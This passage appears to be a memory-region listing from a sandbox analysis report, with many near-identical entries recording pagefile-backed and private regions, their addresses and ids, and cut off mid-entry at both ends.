region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14757 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14758 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14759 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14760 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14761 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14762 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14763 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14764 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14765 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14766 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14767 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14768 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14769 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14770 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14771 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14772 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14773 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14774 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14775 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14776 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14777 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14778 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14779 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14780 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14781 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14782 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14783 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14784 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14785 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14786 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14787 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14788 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14789 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14790 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14791 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14792 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14793 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14794 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14795 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14796 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14797 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14798 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14799 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14800 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14801 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14802 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14803 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14804 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14805 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14806 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14807 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14808 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14809 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14810 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14811 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14812 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14813 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14814 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14815 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14816 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14817 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14818 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14819 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14820 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14821 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14822 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14823 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14824 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14825 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14826 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14827 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14828 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14829 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14830 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14831 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14832 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14833 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14834 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14835 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14836 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14837 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14838 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 14839 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 14840 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14841 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14842 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14843 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14844 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14845 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14846 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14847 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14848 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14849 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14850 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14851 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14852 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14853 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14854 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14855 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14856 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14857 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14858 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14859 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14860 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14861 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14862 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14863 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14864 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14865 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14866 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14867 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14868 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14869 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14870 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14871 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14872 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14873 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14874 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14875 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14876 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14877 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14878 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14879 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14880 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14881 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14882 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14883 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14884 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14885 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14886 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14887 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14888 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14889 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14890 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14891 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14892 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14893 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14894 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14895 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14896 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14897 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14898 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14899 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14900 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14901 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14902 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14903 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14904 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14905 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14906 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14907 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14908 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14909 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14910 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14911 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14912 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14913 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14914 start_va = 0xc870000 end_va = 0xcd62fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c870000" filename = "" Region: id = 14915 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14916 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14917 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14918 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14919 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14920 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14921 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14922 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14923 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14924 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14925 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14926 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14927 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14928 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14929 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14930 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14931 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14932 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14933 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14934 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14935 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14936 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14937 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14938 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14939 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14940 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14941 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14942 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14943 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 14944 start_va = 0x2100000 end_va = 